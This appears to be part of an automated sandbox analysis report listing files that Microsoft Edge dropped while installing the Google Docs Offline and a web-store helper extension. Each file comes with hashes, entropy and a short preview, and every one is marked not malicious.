                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"\u5efa\u7acb\u65b0\u9805\u76ee"},"explanationofflinedisabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\u3002\u5982\u8981\u5728\u6c92\u6709\u4e92\u806f\u7db2\u9023\u7dda\u7684\u60c5\u6cc1\u4e0b\u4f7f\u7528\u300cGoogle \u6587\u4ef6\u300d\uff0c\u8acb\u524d\u5f80\u300cGoogle \u6587\u4ef6\u300d\u9996\u9801\u7684\u8a2d\u5b9a\uff0c\u4e26\u5728\u4e0b\u6b21\u9023\u63a5\u4e92\u806f\u7db2\u6642\u958b\u555f\u96e2\u7dda\u540c\u6b65\u529f\u80fd\u3002"},"explanationofflineenabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\uff0c\u4f46\u60a8\u4ecd\u53ef\u4ee5\u7de8\u8f2f\u53ef\u7528\u6a94\u6848\u6216\u5efa\u7acb\u65b0\u6a94\u6848\u3002"},"extdesc":{"message":"\u7de8\u8f2f\u3001\u5efa\u7acb\u53ca\u67e5\u770b\u60a8\u7684\u6587\u4ef6\u3001\u8a66\u7b97\u8868\u548c\u7c21\u5831\uff0c\u5b8c\u5168\u4e0d\u9700\u4f7f\u7528\u4e92\u806f\u7db2\u3002"},"extname":{"message":"\u300cGoogle \u6587\u4ef6\u300d\u96e2\u7dda\u7248"},"learnmore":{"message":"\u77ad\u89e3\u8a

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7312_2079598663\CRX_INSTALL\_locales\zh_TW\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):843
                                                                                                                                                                                                                                                                  Entropy (8bit):5.76581227215314
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgmaCBxNtBtA24ZOuAeOEHGOCBxetBtMHQIJECSUnLRNocPNy6CBhU5OGg1O:1HAEfQkekYyLvRmcPGgzcL2kx5U
                                                                                                                                                                                                                                                                  MD5:0E60627ACFD18F44D4DF469D8DCE6D30
                                                                                                                                                                                                                                                                  SHA1:2BFCB0C3CA6B50D69AD5745FA692BAF0708DB4B5
                                                                                                                                                                                                                                                                  SHA-256:F94C6DDEDF067642A1AF18D629778EC65E02B6097A8532B7E794502747AEB008
                                                                                                                                                                                                                                                                  SHA-512:6FF517EED4381A61075AC7C8E80C73FAFAE7C0583BA4FA7F4951DD7DBE183C253702DEE44B3276EFC566F295DAC1592271BE5E0AC0C7D2C9F6062054418C7C27
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": ".....".. },.. "explanationofflinedisabled": {.. "message": ".................. Google ................ Google .................".. },.. "explanationofflineenabled": {.. "message": ".........................".. },.. "extdesc": {.. "message": ".............................".. },.. "extname": {.. "message": "Google .....".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "................................".. }..}..

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7312_2079598663\CRX_INSTALL\_locales\zu\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):912
                                                                                                                                                                                                                                                                  Entropy (8bit):4.65963951143349
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:YlMBKqLnI7EgBLWFQbTQIF+j4h3OadMJzLWnCieqgwLeOvKrCRPE:YlMBKqjI7EQOQb0Pj4heOWqeyaBrMPE
                                                                                                                                                                                                                                                                  MD5:71F916A64F98B6D1B5D1F62D297FDEC1
                                                                                                                                                                                                                                                                  SHA1:9386E8F723C3F42DA5B3F7E0B9970D2664EA0BAA
                                                                                                                                                                                                                                                                  SHA-256:EC78DDD4CCF32B5D76EC701A20167C3FBD146D79A505E4FB0421FC1E5CF4AA63
                                                                                                                                                                                                                                                                  SHA-512:30FA4E02120AF1BE6E7CC7DBB15FAE5D50825BD6B3CF28EF21D2F2E217B14AF5B76CFCC165685C3EDC1D09536BFCB10CA07E1E2CC0DA891CEC05E19394AD7144
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"DALA ENTSHA"},"explanationofflinedisabled":{"message":"Awuxhunyiwe ku-inthanethi. Ukuze usebenzise i-Google Amadokhumenti ngaphandle koxhumano lwe-inthanethi, iya kokuthi izilungiselelo ekhasini lasekhaya le-Google Amadokhumenti bese uvula ukuvumelanisa okungaxhunyiwe ku-inthanethi ngesikhathi esilandelayo lapho uxhunywe ku-inthanethi."},"explanationofflineenabled":{"message":"Awuxhunyiwe ku-inthanethi, kodwa usangakwazi ukuhlela amafayela atholakalayo noma udale amasha."},"extdesc":{"message":"Hlela, dala, futhi ubuke amadokhumenti akho, amaspredishithi, namaphrezentheshini \u2014 konke ngaphandle kokufinyelela kwe-inthanethi."},"extname":{"message":"I-Google Amadokhumenti engaxhumekile ku-intanethi"},"learnmore":{"message":"Funda kabanzi"},"popuphelptext":{"message":"Bhala, hlela, futhi hlanganyela noma yikuphi lapho okhona, unalo noma ungenalo uxhumano lwe-inthanethi."}}.

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7312_2079598663\CRX_INSTALL\_metadata\verified_contents.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):11406
                                                                                                                                                                                                                                                                  Entropy (8bit):5.745845607168024
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:192:RBG1G1UPkUj/86Op//Ier/2nsNLJtwg+K8HNnswuH+svyw6r+cgTSJJT4LGkt:m8IEI4u8/EgG4
                                                                                                                                                                                                                                                                  MD5:0A68C9539A188B8BB4F9573F2F2321D6
                                                                                                                                                                                                                                                                  SHA1:E0F814FA4DCC04EDC6A5D39CBC1038979E88F0E5
                                                                                                                                                                                                                                                                  SHA-256:39E6C25D096AFD156644F07586D85E37F1F7B3DA9B636471E8D15CEB14DB184F
                                                                                                                                                                                                                                                                  SHA-512:13F133C173C6622B8E1B6F86A551CBC5B0B2446B3CF96E4AE8CA2646009B99E4A360C2DB3168CB94A488FAEBD215003DFA60D10150B7A85B5F8919900BD01CCC
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:[{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiIxMjgucG5nIiwicm9vdF9oYXNoIjoiZ2NWZy0xWWgySktRNVFtUmtjZGNmamU1dzVIc1JNN1ZCTmJyaHJ4eGZ5ZyJ9LHsicGF0aCI6Il9sb2NhbGVzL2FmL21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJxaElnV3hDSFVNLWZvSmVFWWFiWWlCNU9nTm9ncUViWUpOcEFhZG5KR0VjIn0seyJwYXRoIjoiX2xvY2FsZXMvYW0vbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IlpPQWJ3cEs2THFGcGxYYjh4RVUyY0VkU0R1aVY0cERNN2lEQ1RKTTIyTzgifSx7InBhdGgiOiJfbG9jYWxlcy9hci9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiUjJVaEZjdTVFcEJfUUZtU19QeGstWWRrSVZqd3l6WEoxdURVZEMyRE9BSSJ9LHsicGF0aCI6Il9sb2NhbGVzL2F6L21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJZVVJ3Mmp4UU5Lem1TZkY0YS1xcTBzbFBSSFc4eUlXRGtMY2g4Ry0zdjJRIn0seyJwYXRoIjoiX2xvY2FsZXMvYmUvbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IjNmRm9XYUZmUHJNelRXSkJsMXlqbUlyRDZ2dzlsa1VxdzZTdjAyUk1oVkEifSx7InBhdGgiOiJfbG9jYWxlcy9iZy9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiSXJ3M3RIem9xREx6bHdGa0hjTllOWFoyNmI0WWVwT2t4ZFN

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7312_2079598663\CRX_INSTALL\dasherSettingSchema.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):854
                                                                                                                                                                                                                                                                  Entropy (8bit):4.284628987131403
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:12:ont+QByTwnnGNcMbyWM+Q9TZldnnnGGxlF/S0WOtUL0M0r:vOrGe4dDCVGOjWJ0nr
                                                                                                                                                                                                                                                                  MD5:4EC1DF2DA46182103D2FFC3B92D20CA5
                                                                                                                                                                                                                                                                  SHA1:FB9D1BA3710CF31A87165317C6EDC110E98994CE
                                                                                                                                                                                                                                                                  SHA-256:6C69CE0FE6FAB14F1990A320D704FEE362C175C00EB6C9224AA6F41108918CA6
                                                                                                                                                                                                                                                                  SHA-512:939D81E6A82B10FF73A35C931052D8D53D42D915E526665079EEB4820DF4D70F1C6AEBAB70B59519A0014A48514833FEFD687D5A3ED1B06482223A168292105D
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{. "type": "object",. "properties": {. "allowedDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Allow users to enable Docs offline for the specified managed domains.",. "description": "Users on managed devices will be able to enable docs offline if they are part of the specified managed domains.". },. "autoEnabledDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Auto enable Docs offline for the specified managed domains in certain eligible situations.",. "description": "Users on managed devices, in certain eligible situations, will be able to automatically access and edit recent files offline for the managed domains set in this property. They can still disable it from Drive settings.". }. }.}.

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7312_2079598663\CRX_INSTALL\manifest.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):2525
                                                                                                                                                                                                                                                                  Entropy (8bit):5.417954053901
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:1HEZ4WPoolELb/KxktGw3VwELb/4iL2QDkUpvdz1xxy/Atj17x9yiVvQe:WdP5aLTKQGwlTLT4oRvvxs/AP7xgiVb
                                                                                                                                                                                                                                                                  MD5:5E425DC36364927B1348F6C48B68C948
                                                                                                                                                                                                                                                                  SHA1:9E411B88453DEF3F7CFCB3EAA543C69AD832B82F
                                                                                                                                                                                                                                                                  SHA-256:32D9C8DE71A40D71FC61AD52AA07E809D07DF57A2F4F7855E8FC300F87FFC642
                                                                                                                                                                                                                                                                  SHA-512:C19217B9AF82C1EE1015D4DFC4234A5CE0A4E482430455ABAAFAE3F9C8AE0F7E5D2ED7727502760F1B0656F0A079CB23B132188AE425E001802738A91D8C5D79
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{.. "author": {.. "email": "docs-hosted-app-own@google.com".. },.. "background": {.. "service_worker": "service_worker_bin_prod.js".. },.. "content_capabilities": {.. "matches": [ "https://docs.google.com/*", "https://drive.google.com/*", "https://drive-autopush.corp.google.com/*", "https://drive-daily-0.corp.google.com/*", "https://drive-daily-1.corp.google.com/*", "https://drive-daily-2.corp.google.com/*", "https://drive-daily-3.corp.google.com/*", "https://drive-daily-4.corp.google.com/*", "https://drive-daily-5.corp.google.com/*", "https://drive-daily-6.corp.google.com/*", "https://drive-preprod.corp.google.com/*", "https://drive-staging.corp.google.com/*" ],.. "permissions": [ "clipboardRead", "clipboardWrite", "unlimitedStorage" ].. },.. "content_security_policy": {.. "extension_pages": "script-src 'self'; object-src 'self'".. },.. "default_locale": "en_US",.. "description": "__MSG_extDesc__",.. "externally_connectable": {.. "ma

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7312_2079598663\CRX_INSTALL\offscreendocument.html

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):97
                                                                                                                                                                                                                                                                  Entropy (8bit):4.862433271815736
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:PouV7uJL5XL/oGLvLAAJR90bZNGXIL0Hac4NGb:hxuJL5XsOv0EmNV4HX4Qb
                                                                                                                                                                                                                                                                  MD5:B747B5922A0BC74BBF0A9BC59DF7685F
                                                                                                                                                                                                                                                                  SHA1:7BF124B0BE8EE2CFCD2506C1C6FFC74D1650108C
                                                                                                                                                                                                                                                                  SHA-256:B9FA2D52A4FFABB438B56184131B893B04655B01F336066415D4FE839EFE64E7
                                                                                                                                                                                                                                                                  SHA-512:7567761BE4054FCB31885E16D119CD4E419A423FFB83C3B3ED80BFBF64E78A73C2E97AAE4E24AB25486CD1E43877842DB0836DB58FBFBCEF495BC53F9B2A20EC
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:<!DOCTYPE html>.<html>.<body>. <script src="offscreendocument_main.js"></script>.</body>.</html>

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7312_2079598663\CRX_INSTALL\offscreendocument_main.js

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (4882)
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):122218
                                                                                                                                                                                                                                                                  Entropy (8bit):5.439997574414675
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:1536:naCwKqAbNBbV9HGsR43l9S6w3xu7gXMgaG0R6RxNbF4Ki3wqP+PrQY2PEtb1B:Jfcs1XMr2zbF4Ki+PkPEfB
                                                                                                                                                                                                                                                                  MD5:67C4451398037DD1C497A1EA98227630
                                                                                                                                                                                                                                                                  SHA1:F5BB00D46BCAB5A8A02E68E4895AEB6859B74AA8
                                                                                                                                                                                                                                                                  SHA-256:59123D5A34A319791E90391FC55F0F4B8F5ABB6DB67353609DB25ACC3E99C166
                                                                                                                                                                                                                                                                  SHA-512:17F35CE2A11C26168CC52C4AE2BEC548A1AEB1B1F9CB3475B0552BDE71CFE94C5C0C4F3F51267EF7C7D9B0E01E1D1259F48968E70EE1E905471BA0C76ECA81EA
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:'use strict';function aa(){return function(a){return a}}function k(){return function(){}}function n(a){return function(){return this[a]}}function ba(a){return function(){return a}}var q;function ca(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var da=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function ea(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var ha=ea(this);function r(a,b){if(b)a:{var c=ha;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&da(c,a,{configurable:!0,writable:!0,value:b})}}.r("Symbol",function(a){function b(f){if(this instanceof b)throw new T

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7312_2079598663\CRX_INSTALL\page_embed_script.js

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):291
                                                                                                                                                                                                                                                                  Entropy (8bit):4.65176400421739
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:6:2LGX86tj66rU8j6D3bWq2un/XBtzHrH9Mnj63LK603:2Q8KVqb2u/Rt3Onj1
                                                                                                                                                                                                                                                                  MD5:3AB0CD0F493B1B185B42AD38AE2DD572
                                                                                                                                                                                                                                                                  SHA1:079B79C2ED6F67B5A5BD9BC8C85801F96B1B0F4B
                                                                                                                                                                                                                                                                  SHA-256:73E3888CCBC8E0425C3D2F8D1E6A7211F7910800EEDE7B1E23AD43D3B21173F7
                                                                                                                                                                                                                                                                  SHA-512:32F9DB54654F29F39D49F7A24A1FC800DBC0D4A8A1BAB2369C6F9799BC6ADE54962EFF6010EF6D6419AE51D5B53EC4B26B6E2CDD98DEF7CC0D2ADC3A865F37D3
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:(function(){window._docs_chrome_extension_exists=!0;window._docs_chrome_extension_features_version=2;window._docs_chrome_extension_permissions="alarms clipboardRead clipboardWrite storage unlimitedStorage offscreen".split(" ");window._docs_chrome_extension_manifest_version=3;}).call(this);.

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7312_2079598663\CRX_INSTALL\service_worker_bin_prod.js

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (4882)
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):130866
                                                                                                                                                                                                                                                                  Entropy (8bit):5.425065147784983
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:1536:zKjBw7l0GLFqjLmqoTquyBQCGLu5fJDX5pwPGFSS2IH0dKxQ5SbNyO+DrxZlkaY8:XYQi3DX5WkfH0dKxdboDrNOdor
                                                                                                                                                                                                                                                                  MD5:1A8A1F4E5BA291867D4FA8EF94243EFA
                                                                                                                                                                                                                                                                  SHA1:B25076D2AE85BD5E4ABA935F758D5122CCB82C36
                                                                                                                                                                                                                                                                  SHA-256:441385D13C00F82ABEEDD56EC9A7B2FE90658C9AACB7824DEA47BB46440C335B
                                                                                                                                                                                                                                                                  SHA-512:F05668098B11C60D0DDC3555FCB51C3868BB07BA20597358EBA3FEED91E59F122E07ECB0BD06743461DFFF8981E3E75A53217713ABF2A78FB4F955641F63537C
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:'use strict';function aa(){return function(a){return a}}function k(){return function(){}}function n(a){return function(){return this[a]}}function ba(a){return function(){return a}}var q;function ca(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var da=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function ea(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var fa=ea(this);function r(a,b){if(b)a:{var c=fa;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&da(c,a,{configurable:!0,writable:!0,value:b})}}.r("Symbol",function(a){function b(f){if(this instanceof b)throw new T

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7312_597453290\CRX_INSTALL\_metadata\verified_contents.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):1753
                                                                                                                                                                                                                                                                  Entropy (8bit):5.8889033066924155
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:48:Pxpr7Xka2NXDpfsBJODI19Kg1JqcJW9O//JE3ZBDcpu/x:L3XgNSz9/4kIO3u3Xgpq
                                                                                                                                                                                                                                                                  MD5:738E757B92939B24CDBBD0EFC2601315
                                                                                                                                                                                                                                                                  SHA1:77058CBAFA625AAFBEA867052136C11AD3332143
                                                                                                                                                                                                                                                                  SHA-256:D23B2BA94BA22BBB681E6362AE5870ACD8A3280FA9E7241B86A9E12982968947
                                                                                                                                                                                                                                                                  SHA-512:DCA3E12DD5A9F1802DB6D11B009FCE2B787E79B9F730094367C9F26D1D87AF1EA072FF5B10888648FB1231DD83475CF45594BB0C9915B655EE363A3127A5FFC2
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:[.. {.. "description": "treehash per file",.. "signed_content": {.. "payload": "eyJpdGVtX2lkIjoiam1qZmxnanBjcGVwZWFmbW1nZHBma29na2doY3BpaGEiLCJpdGVtX3ZlcnNpb24iOiIxLjIuMSIsInByb3RvY29sX3ZlcnNpb24iOjEsImNvbnRlbnRfaGFzaGVzIjpbeyJmb3JtYXQiOiJ0cmVlaGFzaCIsImRpZ2VzdCI6InNoYTI1NiIsImJsb2NrX3NpemUiOjQwOTYsImhhc2hfYmxvY2tfc2l6ZSI6NDA5NiwiZmlsZXMiOlt7InBhdGgiOiJjb250ZW50LmpzIiwicm9vdF9oYXNoIjoiQS13R1JtV0VpM1lybmxQNktneUdrVWJ5Q0FoTG9JZnRRZGtHUnBEcnp1QSJ9LHsicGF0aCI6ImNvbnRlbnRfbmV3LmpzIiwicm9vdF9oYXNoIjoiVU00WVRBMHc5NFlqSHVzVVJaVTFlU2FBSjFXVENKcHhHQUtXMGxhcDIzUSJ9LHsicGF0aCI6Im1hbmlmZXN0Lmpzb24iLCJyb290X2hhc2giOiJKNXYwVTkwRmN0ejBveWJMZmZuNm5TbHFLU0h2bHF2YkdWYW9FeWFOZU1zIn1dfV19",.. "signatures": [.. {.. "header": {.. "kid": "publisher".. },.. "protected": "eyJhbGciOiJSUzI1NiJ9",.. "signature": "UglEEilkOml5P1W0X6wc-_dB87PQB73uMir11923av57zPKujb4IUe_lbGpn7cRZsy6x-8i9eEKxAW7L2TSmYqrcp4XtiON6ppcf27FWACXOUJDax9wlMr-EOtyZhykCnB9vR

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7312_597453290\CRX_INSTALL\content.js

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 text, with very long lines (8031), with no line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):9815
                                                                                                                                                                                                                                                                  Entropy (8bit):6.1716321262973315
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3zEScQZBMX:+ThBVq3npozftROQIyVfjRZGB365Ey97
                                                                                                                                                                                                                                                                  MD5:3D20584F7F6C8EAC79E17CCA4207FB79
                                                                                                                                                                                                                                                                  SHA1:3C16DCC27AE52431C8CDD92FBAAB0341524D3092
                                                                                                                                                                                                                                                                  SHA-256:0D40A5153CB66B5BDE64906CA3AE750494098F68AD0B4D091256939EEA243643
                                                                                                                                                                                                                                                                  SHA-512:315D1B4CC2E70C72D7EB7D51E0F304F6E64AC13AE301FD2E46D585243A6C936B2AD35A0964745D291AE9B317C316A29760B9B9782C88CC6A68599DB531F87D59
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7312_597453290\CRX_INSTALL\content_new.js

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 text, with very long lines (8604), with no line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):10388
                                                                                                                                                                                                                                                                  Entropy (8bit):6.174387413738973
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3EbmE1F4fn:+ThBVq3npozftROQIyVfjRZGB365Ey9+
                                                                                                                                                                                                                                                                  MD5:3DE1E7D989C232FC1B58F4E32DE15D64
                                                                                                                                                                                                                                                                  SHA1:42B152EA7E7F31A964914F344543B8BF14B5F558
                                                                                                                                                                                                                                                                  SHA-256:D4AA4602A1590A4B8A1BCE8B8D670264C9FB532ADC97A72BC10C43343650385A
                                                                                                                                                                                                                                                                  SHA-512:177E5BDF3A1149B0229B6297BAF7B122602F7BD753F96AA41CCF2D15B2BCF6AF368A39BB20336CCCE121645EC097F6BEDB94666C74ACB6174EB728FBFC43BC2A
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7312_597453290\CRX_INSTALL\manifest.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):962
                                                                                                                                                                                                                                                                  Entropy (8bit):5.698567446030411
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:1Hg9+D3DRnbuF2+sUrzUu+Y9VwE+Fg41T1O:NBqY+6E+F7JO
                                                                                                                                                                                                                                                                  MD5:E805E9E69FD6ECDCA65136957B1FB3BE
                                                                                                                                                                                                                                                                  SHA1:2356F60884130C86A45D4B232A26062C7830E622
                                                                                                                                                                                                                                                                  SHA-256:5694C91F7D165C6F25DAF0825C18B373B0A81EA122C89DA60438CD487455FD6A
                                                                                                                                                                                                                                                                  SHA-512:049662EF470D2B9E030A06006894041AE6F787449E4AB1FBF4959ADCB88C6BB87A957490212697815BB3627763C01B7B243CF4E3C4620173A95795884D998A75
